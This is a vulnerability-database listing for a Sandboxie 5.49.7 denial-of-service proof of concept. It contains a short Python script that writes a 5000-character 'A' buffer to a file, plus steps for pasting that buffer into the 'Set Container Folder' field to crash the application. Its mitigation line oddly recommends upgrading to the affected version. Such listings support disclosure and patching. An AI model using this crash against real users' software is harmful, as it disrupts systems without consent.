header-logo
Suggest Exploit
vendor:
Sandboxie
by:
Erick Galindo
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Sandboxie
Affected Version From: 5.49.7
Affected Version To: 5.49.7
Patch Exists: YES
Related CWE: N/A
CPE: a:sandboxie_plus:sandboxie
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro x64
2021

Sandboxie 5.49.7 – Denial of Service (PoC)

Sandboxie 5.49.7 is vulnerable to a denial of service attack when a specially crafted buffer of 5000 'A' characters is copied to the clipboard and pasted into the 'Set Container Folder' input field. This causes the application to crash.

Mitigation:

Upgrade to the latest version of Sandboxie 5.49.7 or later.
Source

Exploit-DB raw data:

# Exploit Title: Sandboxie 5.49.7 - Denial of Service (PoC)
# Date: 06/05/2021
# Author: Erick Galindo 
# Vendor Homepage: https://sandboxie-plus.com/
# Software https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Classic-x64-v5.49.7.exe
# Version: 5.49.7
# Tested on: Windows 10 Pro x64 es

# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Sandboxie Control->Sandbox->Set Container Folder
#3.- Paste the buffer in the input then press ok

buffer = "\x41" * 5000

f = open ("Sandboxie10.txt", "w")
f.write(buffer)
f.close()